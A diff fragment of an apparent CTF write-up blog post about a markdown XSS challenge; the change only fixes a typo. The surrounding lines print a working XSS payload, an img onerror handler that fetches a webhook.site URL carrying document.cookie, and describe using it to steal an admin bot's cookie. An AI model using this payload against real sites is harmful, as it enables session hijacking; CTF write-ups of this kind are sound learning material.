DavidShenkerman/DavidShenkerman.github.io/_posts/2024-06-02-Week-3-Angstrom-and-L3ak.md

 <img src=x onerror="fetch('https://webhook.site/410fec2e-da06-4914-96be-866915b53dc5' + '?' + document.cookie)">
 ```

-This actually made my broser send my cookie to the webhook I set up, which proved the XSS worked.
+This actually made my browser send my cookie to the webhook I set up, which proved the XSS worked.
 From here, I simply provided the link to the admin bot, and it visited the note.
 As soon as it did, the admin's browser sent its cookie to my webhook.

 ![Markdown](/assets/MarkDownXSSProof.jpg)